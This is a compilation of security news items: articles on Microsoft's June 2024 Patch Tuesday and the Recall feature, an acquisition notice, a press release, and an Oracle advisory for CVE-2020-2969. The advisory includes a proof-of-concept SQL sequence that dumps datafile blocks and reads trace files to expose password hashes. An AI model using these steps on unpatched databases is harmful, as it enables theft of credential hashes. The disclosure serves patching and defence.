(CVE-2023-45290)Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-45290References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2268017

Red Hat Security Advisory 2024-3830-03

CVE-2024-30080 is the only critical issue in Microsoft's June 2024 Patch Tuesday update, but many others require prompt attention as well.

Source: SuPatMaN via Shutterstock

Microsoft has issued fixes for a total of 49 vulnerabilities in its Patch Tuesday security update for June, including a critical bug in Microsoft Message Queuing (MSMQ) technology that could open vast swathes of companies to remote code execution (RCE) and server takeover.

The issue (CVE-2024-30080, CVSS score of 9.8 out of 10) is remotely exploitable, with low attack complexity, requires no privileges, and takes no user interaction; and it carries high impacts on confidentiality, integrity, and availability, according to Microsoft. Attackers can use it to completely take over an affected server by sending a specially crafted malicious MSMQ packet. To check vulnerability, confirm users should whether the 'Message Queuing' service is running and if TCP port 1801 is open on the system. The bug affects all versions of Windows starting from Windows Server 2008 and Windows 10.

Its impact could be felt in the threat landscape sooner rather than later, so patching quickly is a must: "A couple of quick Shodan searches reveal over a million hosts running with port 1801 open and over 3500 results for 'msmq'," said Tyler Reguly, associate director security R&D at Fortra, in an emailed statement. "Given this is a remote code execution, I would expect to see this vulnerability included in exploit frameworks in the near future."

This is the only bug that Microsoft has rated as critical this month, but there are several others in the update that merit prompt attention as well, according to security analysts.

**High-Priority Microsoft Bugs for June 2024**

Among the high-priority bugs to put at the top of the patching list are: CVE-2024-30103, a remote code execution (RCE) vulnerability in Microsoft Outlook in which the Preview Pane is an attack vector; CVE-2024-30089, a vulnerability in Microsoft Streaming Services that gives attackers a way to gain system level access; CVE-2024-30085, a privilege escalation bug in Windows Cloud Files Mini Filter Driver that Microsoft has identified as more likely to be exploited; and CVE-2024-30099, an elevation-of-privilege (EoP) vulnerability in Windows Kernel Driver that attackers can abuse to take over an affected system.

In all, Microsoft categorized 11 of the 49 vulnerabilities in this month's update as flaws that threat actors were more likely to exploit because of factors like low attack complexity and the fact that adversaries need no special privileges or user interaction to take advantage of them.

**RCE Bugs to Prioritize**

This month's collection of noteworthy RCE bugs include CVE-2024-30101, a use-after-free bug in Microsoft Office that requires active user interaction for an attack to succeed; CVE-2024-30104 in Microsoft Office; and the previously mentioned CVE-2024-30103 in Microsoft Outlook, which an attacker can trigger via the Preview Pane in an email.

The latter is potentially especially dangerous because an attacker can use it to bypass Outlook registry block lists and enable the creation of malicious DLL files.

"This Microsoft Outlook vulnerability can be circulated from user to user, and doesn't require a click to execute," Morphisec researchers said in a blog. "Rather, execution initiates when an affected email is opened. This is notably dangerous for accounts using Microsoft Outlook’s auto-open email feature."

Microsoft itself has assessed the flaw as something that attackers are less likely to exploit.

**High Number of Elevation-of-Privilege Bugs**

Somewhat unusually, there were more EoP flaws this time around than there were RCE bugs, accounting for nearly half of the CVEs patched.

Satnam Narang, senior staff research engineer at Tenable, pointed to CVE-2024-30089, the bug in Microsoft Streaming Services, as one of the privilege escalation flaws that organizations need to prioritize the most.

"These types of flaws are notoriously useful for cybercriminals seeking to elevate privileges on a compromised system," Narang said. "When exploited in the wild as a zero-day, they are typically associated with more advanced persistent threat (APT) actors or as part of targeted attacks."

CVE-2024-30089 is one of two EoP vulnerabilities in Streaming Service that Microsoft disclosed this month. The other is CVE-2024-30090, which also gives attackers a way to gain system-level privileges but is harder to exploit.

In prepared comments, Kev Breen, senior director threat research at Immersive Lab, identified CVE-2024-30085 as another EoP flaw that will likely draw attacker interest. The bug in Windows Cloud Mini Files Driver allows for system level privileges on a local machine.

"This type of privilege-escalation step is frequently seen by threat actors in network compromises, as it can enable the attacker to disable security tools or run credential dumping tools like Mimikatz," for lateral movement and further compromise, he said. Microsoft's description of the flaw suggests it is identical to CVE-2023-36036, a zero-day bug in Cloud Files Mini Filter that attackers actively exploited last year, Breen said.

CVE-2024-30099 is another EoP vulnerability that Microsoft has listed in its more category of more exploitable bugs. What makes the bug especially noteworthy is that it exists in the NT OS kernel. The vulnerability allows an attacker that can trigger — and win — a race condition within the kernel to take over an affected system. However, the Windows Message Queuing Service must be enabled for an attacker to be successful.

"This vulnerability should be on everyone's patch list due to it being so central to the operating system," said Ben McCarthy, lead cyber security engineer at Immersive Labs, in emailed comments.

There are several other kernel-related EoP vulnerabilities that organizations would do well to prioritize, McCarthy noted. These include CVE-2024-35250, CVE-2024-30084, CVE-2024-30064, CVE-2024-30068, and CVE-2024-35250.

"These sorts of vulnerabilities are often what attackers will try to weaponize after the patch day," he said. "So, it is always wise to patch kernel-related vulnerabilities because successful exploitation of these vulnerabilities mean they get complete access to a computer's resources and run as SYSTEM privileges."

**About the Author(s)**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

Critical MSMQ RCE Bug Opens Microsoft Servers to Complete Takeover

Microsoft today released updates to fix more than 50 security vulnerabilities in Windows and related software, a relatively light Patch Tuesday this month for Windows administrators. The software giant also responded to a torrent of negative feedback on a new feature of Redmond's flagship operating system that constantly takes screenshots of whatever users are doing on their computers, saying the feature would no longer be enabled by default.

**Microsoft** today released updates to fix more than 50 security vulnerabilities in **Windows** and related software, a relatively light Patch Tuesday this month for Windows users. The software giant also responded to a torrent of negative feedback on a new feature of Redmond’s flagship operating system that constantly takes screenshots of whatever users are doing on their computers, saying the feature would no longer be enabled by default.

Last month, Microsoft debuted **Copilot+ PCs**, an AI-enabled version of Windows. Copilot+ ships with a feature nobody asked for that Redmond has aptly dubbed **Recall**, which constantly takes screenshots of what the user is doing on their PC. Security experts roundly trashed Recall as a fancy keylogger, noting that it would be a gold mine of information for attackers if the user’s PC was compromised with malware.

Microsoft countered that Recall snapshots never leave the user’s system, and that even if attackers managed to hack a Copilot+ PC they would not be able to exfiltrate on-device Recall data. But that claim rang hollow after former Microsoft threat analyst **Kevin Beaumont** detailed on his blog how any user on the system (even a non-administrator) can export Recall data, which is just stored in an SQLite database locally.

“I’m not being hyperbolic when I say this is the dumbest cybersecurity move in a decade,” Beaumont said on Mastodon.

In a recent Risky Business podcast, host **Patrick Gray** noted that the screenshots created and indexed by Recall would be a boon to any attacker who suddenly finds himself in an unfamiliar environment.

“The first thing you want to do when you get on a machine if you’re up to no good is to figure out how someone did their job,” Gray said. “We saw that in the case of the SWIFT attacks against central banks years ago. Attackers had to do screen recordings to figure out how transfers work. And this could speed up that sort of discovery process.”

Responding to the withering criticism of Recall, Microsoft said last week that it will no longer be enabled by default on Copilot+ PCs.

Only one of the patches released today — CVE-2004-30080 — earned Microsoft’s most urgent “critical” rating, meaning malware or malcontents could exploit the vulnerability to remotely seize control over a user’s system, without any user interaction.

CVE-2024-30080 is a flaw in the **Microsoft Message Queuing** (MSMQ) service that can allow attackers to execute code of their choosing. Microsoft says exploitation of this weakness is likely, enough to encourage users to disable the vulnerable component if updating isn’t possible in the short run. CVE-2024-30080 has been assigned a CVSS vulnerability score of 9.8 (10 is the worst).

**Kevin Breen**, senior director of threat research at **Immersive Labs**, said a saving grace is that MSMQ is not a default service on Windows.

“A Shodan search for MSMQ reveals there are a few thousand potentially internet-facing MSSQ servers that could be vulnerable to zero-day attacks if not patched quickly,” Breen said.

CVE-2024-30078 is a remote code execution weakness in the **Windows WiFi Driver**, which also has a CVSS score of 9.8. According to Microsoft, an unauthenticated attacker could exploit this bug by sending a malicious data packet to anyone else on the same network — meaning this flaw assumes the attacker has access to the local network.

Microsoft also fixed a number of serious security issues with its **Office** applications, including at least two remote-code execution flaws, said **Adam Barnett**, lead software engineer at **Rapid7**.

“CVE-2024-30101 is a vulnerability in **Outlook**; although the Preview Pane is a vector, the user must subsequently perform unspecified specific actions to trigger the vulnerability and the attacker must win a race condition,” Barnett said. “CVE-2024-30104 does not have the Preview Pane as a vector, but nevertheless ends up with a slightly higher CVSS base score of 7.8, since exploitation relies solely on the user opening a malicious file.”

Separately, Adobe released security updates for **Acrobat**, **ColdFusion**, and **Photoshop**, among others.

As usual, the SANS Internet Storm Center has the skinny on the individual patches released today, indexed by severity, exploitability and urgency. Windows admins should also keep an eye on AskWoody.com, which often publishes early reports of any Windows patches gone awry.

Patch Tuesday, June 2024 “Recall” Edition

Lacework has been looking for a buyer for some time. The deal gives Fortinet a boost in the cloud security space.

Fortinet announced Monday its plans to acquire cloud security firm Lacework to enhance its secure access service edge (SASE) offerings with cloud-native security services.

Lacework integrates cloud-native application protection platform services to safeguard what's happening inside the cloud infrastructure. The data-powered cloud security platform collects and analyzes data from across cloud environments so that customers can manage and secure their cloud workflows. The platform identifies and shares details about abnormal or unexpected activities that could indicate a security problem. Lacework offers artificial intelligence and machine-learning technology, data collection capabilities, a data lake, and code security tools, wrote John Maddison, chief marketing officer at Fortinet, in a blog post announcing the acquisition.

Fortinet plans to integrate capabilities from Lacework's cloud-native application protection platform into its SASE portfolio. According to Maddison, combining Lacework with Fortinet's firewall and Web application and API protection (WAAP) capabilities will allow customers to protect what's happening inside the cloud application, as well as what's happening between the application and outside the network.

Back in 2021, Lacework was valued at $8.3 billion. Earlier this year, there were reports that Wiz was in talks with Lacework for a small fraction of the company's valuation. The terms of Fortinet's deal, expected to be completed in the second half of the year, were not disclosed.

**About the Author(s)**

Fortinet Plans to Acquire Lacework

PRESS RELEASE

WASHINGTON, D.C. – June 6, 2024 – DNSFilter announced today that it has hired TK Keanini as Chief Technology Officer (CTO). In his new role, Keanini will lead product management, customer experience, engineering, and security intelligence toward ongoing innovation and growth, focusing on customer needs and feedback to determine product direction.

Keanini brings to his new role more than 30 years of experience in network security. Prior to joining DNSFilter, he was the Vice President of security architecture and CTO of Cisco Secure. During his time there, he led Cisco’s Encrypted Traffic Analytics security solution, where he saw revolutionary potential in the ability to gain insights through existing network telemetry. He has also held leadership roles at security startups Lancope and nCircle Network Security, as well as at Morgan Stanley Dean Witter Online. 

Keanini is driven by a goal to do right by his customers and ensure their voice is present in product decisions. He brings this passion to DNSFilter, where he will build on the company’s commitment to customer experience in everything it does. 

TK Keanini, CTO, DNSFilter, said: “Cybersecurity companies that grow and succeed long-term have a few consistent properties. First, these solutions have an inherently simple design. Second, the layer protected is one critical (not optional) to both businesses and adversaries alike. And third, these solutions intercept as early in the lifecycle as possible, often the first to detect and respond to a threat. DNSFilter has all three of these properties, and I knew I wanted to join a company where I saw the potential for scale and success.”

Ken Carnesi, CEO and co-founder, DNSFilter, said: ‘We are thrilled to welcome TK to our team. A great CTO bridges the gap between technical innovation and business strategy, ensuring technology drives success. TK brings decades of experience and a passion for his work. He views engineers and developers as creative artists and aims to harness their inventiveness to go beyond the industry standard. With TK on board, we are enhancing our focus on security and driving innovation. Together, we will deliver features that excite our customers and strengthen our position as a key player within the cybersecurity landscape.”

About the company

DNSFilter is redefining how organizations secure their largest threat vector: the Internet itself. DNSFilter is making the internet safer and workplaces more productive, by actively blocking an average of 12M threat queries every single day. With 79% of attacks using Domain Name System (DNS), DNSFilter provides the world’s fastest protective DNS powered by machine learning that uniquely identifies 61% more threats than competitors on an average of ten days earlier, including zero-day attacks.

Over 35 million monthly users trust DNSFilter to protect them from phishing, malware, and advanced cyber threats. DNSFilter’s brands include Webshrinker, its next generation web categorization software, and Guardian, a consumer app focused on privacy protection.

DNSFilter Welcomes Cisco Veteran TK Keanini As CTO

Oracle Database versions 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c, and 19c allows for unauthorized access to password hashes by an account with the DBA role.

Title: CVE-2020-2969 – Unauthorized Access to Password Hashes by Account with DBA role  
Product:                   Database  
Manufacturer:              Oracle  
Affected Version(s):       11.2.0.4, 12.1.0.2, 12.2.0.1, 18c, 19c  
Tested Version(s):         11.2.0.4, 12.1.0.2, 12.2.0.1, 18c, 19c  
Risk Level:                Medium  
Solution Status:           Fixed  
CVE Reference:             CVE-2020-2969  
Base Score:                6.6   
Author of Advisory:        Emad Al-Mousa

*****************************************  
Vulnerability Details:

Vulnerability in the Data Pump component of Oracle Database Server. Supported versions that are affected are 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c and 19c. Difficult to exploit vulnerability allows high privileged attacker having DBA role account privilege with network access via Oracle Net to compromise Data Pump. Successful attacks of this vulnerability can result in takeover of Data Pump.

The presented  scenarios illustrates that an account with “DBA” role can still view/extract the password hashes although the account can’t directly query SYS.USER$ table as a security enhancement since “select any dictionary” system privilege doesn’t provide access to SYS.USER$ anymore

*****************************************  
Proof of Concept (PoC):

This simulation was performed in Oracle Non-CDB environment, and is applicable of course in CDB setup also.

SQL> create user ninja identified by hello_123;

SQL> grant create session to ninja;

SQL> grant dba to ninja;

SQL> alter user ninja default role all;

*** when attempting to select from SYS.USER$ the account will not be able since the system privilege “SELECT ANY DICTIONARY” is changed by restricting direct access to multiple SYS tables such as USER$, ENC$,DEFAULT_PWD$, LINK$, USER_HISTORY$, CDB_LOCAL_ADMINAUTH$

SQL> select * from sys.user$;  
select * from sys.user$  
                  *  
ERROR at line 1:  
ORA-01031: insufficient privileges

** I will perform dump to the system data file to gain access to the hashed passwords

SQL> alter system dump datafile 1 block min 210 block max 215;

** Then immediately I will check the generated trace file name using the query:

SQL> select * from v$diag_info where NAME='Default Trace File';

** I will query the “payload” column of the view V$DIAG_TRACE_FILE that will read the generated trace file contents:

SQL> select payload from V$DIAG_TRACE_FILE_CONTENTS where TRACE_FILENAME='ORCLCDB_ora_6029.trc';

// the password hash will be exposed in the trace file !

After applying Oracle July 2020 CPU patches- try to re-simulate again:

SQL> create user ninja identified by hello_123;

  SQL> grant create session to ninja;

  SQL> grant dba to ninja;

  SQL> alter user ninja default role all;

  SQL> show user  
USER is "NINJA"

SQL> select * from sys.user$;  
select * from sys.user$  
                  *  
ERROR at line 1:  
ORA-01031: insufficient privileges

  SQL> alter system dump datafile 1 block min 210 block max 215;  
alter system dump datafile 1 block min 210 block max 215  
*  
ERROR at line 1:  
ORA-01031: insufficient privileges

 SQL> select * from v$diag_info where NAME='Default Trace File';

    INST_ID NAME  
---------- ----------------------------------------------------------------  
VALUE  
--------------------------------------------------------------------------------  
    CON_ID  
----------  
         1 Default Trace File  
/exp/ora5/diagnostic/diag/rdbms/ora5/ora5/trace/ora5_ora_1171  
16.trc

 SQL> select payload from V$DIAG_TRACE_FILE_CONTENTS where TRACE_FILENAME='ora5_ora_117116.trc';

 PAYLOAD  
--------------------------------------------------------------------------------  
Trace file   
/exp/ora5/diagnostic/diag/rdbms/ora5/ora5/trace/ora5_ora_1171  
16.trc

 Oracle Database 19c Enterprise Edition Release 19.0.0.0.0 - Production  
Version 19.8.0.0.0  
Build label:    RDBMS_19.8.0.0.0DBRU_LINUX.X64_200702  
ORACLE_HOME:    /oraclex/oradbp05/product/19.3  
System name:    Linux  
Node name:      boba  
Release:        3.10.0-1127.13.1.el7.x86_64  
Version:        #1 SMP Fri Jun 12 14:34:17 EDT 2020

 PAYLOAD  
--------------------------------------------------------------------------------  
Machine:        x86_64  
Instance name: ora5  
Redo thread mounted by this instance: 1  
Oracle process number: 69  
Unix process pid: 117116, image: oracle@boba (TNS V1-V3)

  *** 2020-07-16T11:09:31.240875+03:00

 *** SESSION ID:(1174.5281) 2020-07-16T11:09:31.240917+03:00  
*** CLIENT ID:() 2020-07-16T11:09:31.240926+03:00

 PAYLOAD  
--------------------------------------------------------------------------------  
*** SERVICE NAME:(SYS$USERS) 2020-07-16T11:09:31.240932+03:00  
*** MODULE NAME:(SQL*Plus) 2020-07-16T11:09:31.240938+03:00  
*** ACTION NAME:() 2020-07-16T11:09:31.240943+03:00  
*** CLIENT DRIVER:(SQL*PLUS) 2020-07-16T11:09:31.240948+03:00

 Error: file 1 can only be dumped with SYSDBA privillege

*****************************************  
References:  
https://www.oracle.com/security-alerts/cpujul2020.html  
https://www.oracle.com/security-alerts/cpujul2020verbose.html  
https://nvd.nist.gov/vuln/detail/CVE-2020-2969  
https://databasesecurityninja.wordpress.com/2024/06/10/cve-2020-2969-unauthorized-access-to-password-hashes-by-account-with-dba-role/

Tag

#mac